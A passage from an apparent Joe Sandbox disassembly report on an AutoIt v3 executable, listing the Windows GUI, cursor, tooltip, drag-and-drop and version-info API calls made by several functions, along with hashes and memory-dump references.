                                                                    • Instruction Fuzzy Hash: 9C028B30104301EBEBA58F28C858BABBFE5FF49318F04495DFAD9962A1C779D944CB91
                                                                    APIs
                                                                    • GetSysColor.USER32(00000012), ref: 0105A903
                                                                    • SetTextColor.GDI32(?,?), ref: 0105A907
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0105A91D
                                                                    • GetSysColor.USER32(0000000F), ref: 0105A928
                                                                    • CreateSolidBrush.GDI32(?), ref: 0105A92D
                                                                    • GetSysColor.USER32(00000011), ref: 0105A945
                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0105A953
                                                                    • SelectObject.GDI32(?,00000000), ref: 0105A964
                                                                    • SetBkColor.GDI32(?,00000000), ref: 0105A96D
                                                                    • SelectObject.GDI32(?,?), ref: 0105A97A
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0105A999
                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0105A9B0
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0105A9C5
                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0105A9ED
                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0105AA14
                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0105AA32
                                                                    • DrawFocusRect.USER32(?,?), ref: 0105AA3D
                                                                    • GetSysColor.USER32(00000011), ref: 0105AA4B
                                                                    • SetTextColor.GDI32(?,00000000), ref: 0105AA53
                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0105AA67
                                                                    • SelectObject.GDI32(?,0105A5FA), ref: 0105AA7E
                                                                    • DeleteObject.GDI32(?), ref: 0105AA89
                                                                    • SelectObject.GDI32(?,?), ref: 0105AA8F
                                                                    • DeleteObject.GDI32(?), ref: 0105AA94
                                                                    • SetTextColor.GDI32(?,?), ref: 0105AA9A
                                                                    • SetBkColor.GDI32(?,?), ref: 0105AAA4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                    • String ID:
                                                                    • API String ID: 1996641542-0
                                                                    • Opcode ID: b91bce64e7d69925c1451b7b469d45ebc403d611fe8c49dc946727e9ac4c4554
                                                                    • Instruction ID: b5b6cc9782e14e46c15c96f7e794573cdf399c1c5958a0daddc9f18d68dcec57
                                                                    • Opcode Fuzzy Hash: b91bce64e7d69925c1451b7b469d45ebc403d611fe8c49dc946727e9ac4c4554
                                                                    • Instruction Fuzzy Hash: 92516C75900219EFDF219FA8DC48EAF7BB9FF08320F114615FA51AB291D77A9940CB90
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 01058AC1
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01058AD2
                                                                    • CharNextW.USER32(0000014E), ref: 01058B01
                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 01058B42
                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01058B58
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01058B69
                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 01058B86
                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 01058BD8
                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 01058BEE
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 01058C1F
                                                                    • _memset.LIBCMT ref: 01058C44
                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 01058C8D
                                                                    • _memset.LIBCMT ref: 01058CEC
                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 01058D16
                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 01058D6E
                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 01058E1B
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 01058E3D
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01058E87
                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01058EB4
                                                                    • DrawMenuBar.USER32(?), ref: 01058EC3
                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 01058EEB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                    • String ID: 0
                                                                    • API String ID: 1073566785-4108050209
                                                                    • Opcode ID: 05f91aae1e6396f257b2b67d74aaae354a45ae2cf8edcfdaa9bbef71ae35aa6e
                                                                    • Instruction ID: 43432b34ae85f7c3b8917398ea212b2a1ede3509c6795e7b4ac1c8195cedd7f5
                                                                    • Opcode Fuzzy Hash: 05f91aae1e6396f257b2b67d74aaae354a45ae2cf8edcfdaa9bbef71ae35aa6e
                                                                    • Instruction Fuzzy Hash: 73E17470900209EBEF619F65CC88EEF7BB9EF09710F008196FE95AA191D7759680DF60
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 010549CA
                                                                    • GetDesktopWindow.USER32 ref: 010549DF
                                                                    • GetWindowRect.USER32(00000000), ref: 010549E6
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 01054A48
                                                                    • DestroyWindow.USER32(?), ref: 01054A74
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 01054A9D
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01054ABB
                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 01054AE1
                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 01054AF6
                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01054B09
                                                                    • IsWindowVisible.USER32(?), ref: 01054B29
                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01054B44
                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01054B58
                                                                    • GetWindowRect.USER32(?,?), ref: 01054B70
                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 01054B96
                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 01054BB0
                                                                    • CopyRect.USER32(?,?), ref: 01054BC7
                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 01054C32
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                    • String ID: ($0$tooltips_class32
                                                                    • API String ID: 698492251-4156429822
                                                                    • Opcode ID: 8c84c527c586dff63dd06f745a9eb20075d9a009b208c482793054f4f36f2070
                                                                    • Instruction ID: aae82d38549bc4f2c0a761e3986b5671d5b055420f0b0b6b9df3f8d3b4a031c5
                                                                    • Opcode Fuzzy Hash: 8c84c527c586dff63dd06f745a9eb20075d9a009b208c482793054f4f36f2070
                                                                    • Instruction Fuzzy Hash: 54B1AA70608341AFDB84DF68C848BABBBE5BF88314F04891DF9D99B291E775E844CB51
                                                                    APIs
                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 010344AC
                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 010344D2
                                                                    • _wcscpy.LIBCMT ref: 01034500
                                                                    • _wcscmp.LIBCMT ref: 0103450B
                                                                    • _wcscat.LIBCMT ref: 01034521
                                                                    • _wcsstr.LIBCMT ref: 0103452C
                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 01034548
                                                                    • _wcscat.LIBCMT ref: 01034591
                                                                    • _wcscat.LIBCMT ref: 01034598
                                                                    • _wcsncpy.LIBCMT ref: 010345C3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                    • API String ID: 699586101-1459072770
                                                                    • Opcode ID: 66be54bb9a4aca255e29e270b99162f7fc2a278b0798c75e4dbb9bbcdea2f9dc
                                                                    • Instruction ID: 6e2b8c1cadc807a2879f115b99cd5b92e457ed909c81f0d82aeb5e8ece1b164e
                                                                    • Opcode Fuzzy Hash: 66be54bb9a4aca255e29e270b99162f7fc2a278b0798c75e4dbb9bbcdea2f9dc
                                                                    • Instruction Fuzzy Hash: 35414B719002097BDB11BA75CC03EBF37ACEF85310F04005AFA40EA193EF7C9A01A6A9
                                                                    APIs
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FD28BC
                                                                    • GetSystemMetrics.USER32(00000007), ref: 00FD28C4
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FD28EF
                                                                    • GetSystemMetrics.USER32(00000008), ref: 00FD28F7
                                                                    • GetSystemMetrics.USER32(00000004), ref: 00FD291C
                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00FD2939
                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00FD2949
                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FD297C
                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00FD2990
                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00FD29AE
                                                                    • GetStockObject.GDI32(00000011), ref: 00FD29CA
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FD29D5
                                                                      • Part of subcall function 00FD2344: GetCursorPos.USER32(?), ref: 00FD2357
                                                                      • Part of subcall function 00FD2344: ScreenToClient.USER32(010957B0,?), ref: 00FD2374
                                                                      • Part of subcall function 00FD2344: GetAsyncKeyState.USER32(00000001), ref: 00FD2399
                                                                      • Part of subcall function 00FD2344: GetAsyncKeyState.USER32(00000002), ref: 00FD23A7
                                                                    • SetTimer.USER32(00000000,00000000,00000028,00FD1256), ref: 00FD29FC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                    • String ID: AutoIt v3 GUI
                                                                    • API String ID: 1458621304-248962490
                                                                    • Opcode ID: 0c91933a52dd317b729504dee52fd5be6e868ee5182459d48d7c4e7a726f1c02
                                                                    • Instruction ID: 193cec7b25bf11a12b3ba343cc1b25a1c32be235eecea2d3010a39fa0fceab31
                                                                    • Opcode Fuzzy Hash: 0c91933a52dd317b729504dee52fd5be6e868ee5182459d48d7c4e7a726f1c02
                                                                    • Instruction Fuzzy Hash: 9CB1B171A0020ADFEB25DFA8DC55BAE7BB5FB08310F14421AFA55E72D4CB799801DB90
                                                                    APIs
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0102A47A
                                                                    • __swprintf.LIBCMT ref: 0102A51B
                                                                    • _wcscmp.LIBCMT ref: 0102A52E
                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0102A583
                                                                    • _wcscmp.LIBCMT ref: 0102A5BF
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 0102A5F6
                                                                    • GetDlgCtrlID.USER32(?), ref: 0102A648
                                                                    • GetWindowRect.USER32(?,?), ref: 0102A67E
                                                                    • GetParent.USER32(?), ref: 0102A69C
                                                                    • ScreenToClient.USER32(00000000), ref: 0102A6A3
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0102A71D
                                                                    • _wcscmp.LIBCMT ref: 0102A731
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0102A757
                                                                    • _wcscmp.LIBCMT ref: 0102A76B
                                                                      • Part of subcall function 00FF362C: _iswctype.LIBCMT ref: 00FF3634
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                    • String ID: %s%u
                                                                    • API String ID: 3744389584-679674701
                                                                    • Opcode ID: 5801a399314162c0b17761bf0e67a7917c7e195cd9482007159480a50aeb841c
                                                                    • Instruction ID: cd90b1e8724918efe90a72708a643f9d6e93edbda2de67271a02ec17cec03e75
                                                                    • Opcode Fuzzy Hash: 5801a399314162c0b17761bf0e67a7917c7e195cd9482007159480a50aeb841c
                                                                    • Instruction Fuzzy Hash: F4A1C071304726EBDB15DE68C888BAABBE8FF88314F008519EADAC3551DF34E545CB91
                                                                    APIs
                                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0102AF18
                                                                    • _wcscmp.LIBCMT ref: 0102AF29
                                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0102AF51
                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 0102AF6E
                                                                    • _wcscmp.LIBCMT ref: 0102AF8C
                                                                    • _wcsstr.LIBCMT ref: 0102AF9D
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0102AFD5
                                                                    • _wcscmp.LIBCMT ref: 0102AFE5
                                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0102B00C
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0102B055
                                                                    • _wcscmp.LIBCMT ref: 0102B065
                                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0102B08D
                                                                    • GetWindowRect.USER32(00000004,?), ref: 0102B0F6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                    • String ID: @$ThumbnailClass
                                                                    • API String ID: 1788623398-1539354611
                                                                    • Opcode ID: 075b1dfa212ca48f9af199d603efdc387a9d611d72dd0ce10259b63702e15ced
                                                                    • Instruction ID: 517b9529a8a12f1c95df9705dda4f4fa1a0d156fb3970d57235cedf60ed83962
                                                                    • Opcode Fuzzy Hash: 075b1dfa212ca48f9af199d603efdc387a9d611d72dd0ce10259b63702e15ced
                                                                    • Instruction Fuzzy Hash: 9C81E47110431A9FDB51DF18C884FAABBD8FF84314F1884AAFEC58A096DB38D945CB61
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                    • API String ID: 1038674560-1810252412
                                                                    • Opcode ID: c3c7ba96b5ac31392d4c4f6cf3c4485ea122de47fdcec48a85b18e0368f4a927
                                                                    • Instruction ID: ee8c30b3d723fed9eed73c73856c7f3ef462bf103ae581aa99bc251d81cb985c
                                                                    • Opcode Fuzzy Hash: c3c7ba96b5ac31392d4c4f6cf3c4485ea122de47fdcec48a85b18e0368f4a927
                                                                    • Instruction Fuzzy Hash: F131F231648219E6DB00FAA4DE43EBEB7A59F50750F30002AF8C27B5A5FE256B049651
                                                                    APIs
                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 01045013
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0104501E
                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 01045029
                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 01045034
                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 0104503F
                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 0104504A
                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 01045055
                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 01045060
                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 0104506B
                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 01045076
                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 01045081
                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0104508C
                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 01045097
                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 010450A2
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 010450AD
                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 010450B8
                                                                    • GetCursorInfo.USER32(?), ref: 010450C8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$Load$Info
                                                                    • String ID:
                                                                    • API String ID: 2577412497-0
                                                                    • Opcode ID: c5d003450d74b4810474b77f568486f51d5f22a02e5da4bd6d92bfb050f108aa
                                                                    • Instruction ID: 7a70447a4c6d8c855cd1782e7fd7f09603f7e8f8c763f03bb288d29b74298332
                                                                    • Opcode Fuzzy Hash: c5d003450d74b4810474b77f568486f51d5f22a02e5da4bd6d92bfb050f108aa
                                                                    • Instruction Fuzzy Hash: C931F4B1D4831A6BDF609FB68C8995FBFE8FF04750F50453AA54DE7280DA7865008F91
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0105A259
                                                                    • DestroyWindow.USER32(?,?), ref: 0105A2D3
                                                                      • Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0105A34D
                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0105A36F
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0105A382
                                                                    • DestroyWindow.USER32(00000000), ref: 0105A3A4
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FD0000,00000000), ref: 0105A3DB
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0105A3F4
                                                                    • GetDesktopWindow.USER32 ref: 0105A40D
                                                                    • GetWindowRect.USER32(00000000), ref: 0105A414
                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0105A42C
                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0105A444
                                                                      • Part of subcall function 00FD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FD25EC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                    • String ID: 0$tooltips_class32
                                                                    • API String ID: 1297703922-3619404913
                                                                    • Opcode ID: 717ad4bba265574d223142f8f09c60bac83083441333d08bf008fa8bd0a3d799
                                                                    • Instruction ID: 4eb0b9b016f6ee46d4fccadc54391a1858643bdeea53345a33078a0dce05c0c2
                                                                    • Opcode Fuzzy Hash: 717ad4bba265574d223142f8f09c60bac83083441333d08bf008fa8bd0a3d799
                                                                    • Instruction Fuzzy Hash: DC717E70240205AFEB61DF28CC49F6B7BE5FB88304F04465DF9C59B2A1DB7AA902CB51
                                                                    APIs
                                                                      • Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623
                                                                    • DragQueryPoint.SHELL32(?,?), ref: 0105C627
                                                                      • Part of subcall function 0105AB37: ClientToScreen.USER32(?,?), ref: 0105AB60
                                                                      • Part of subcall function 0105AB37: GetWindowRect.USER32(?,?), ref: 0105ABD6
                                                                      • Part of subcall function 0105AB37: PtInRect.USER32(?,?,0105C014), ref: 0105ABE6
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0105C690
                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0105C69B
                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0105C6BE
                                                                    • _wcscat.LIBCMT ref: 0105C6EE
                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0105C705
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0105C71E
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0105C735
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0105C757
                                                                    • DragFinish.SHELL32(?), ref: 0105C75E
                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0105C851
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                    • API String ID: 169749273-3440237614
                                                                    • Opcode ID: c0506696cfa41110a398bff7964ec97bfaa519b1819a8ac8cba608479f97d028
                                                                    • Instruction ID: 5241e5f0e3b0087592d7bd8215036484fc910bd50fbadd47e88bd89781388bdb
                                                                    • Opcode Fuzzy Hash: c0506696cfa41110a398bff7964ec97bfaa519b1819a8ac8cba608479f97d028
                                                                    • Instruction Fuzzy Hash: A0615771108301AFDB11EF64CC85DAFBBE9EF88750F00091EF5D1962A1DB75AA09DB62
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(00000000), ref: 01037D5F
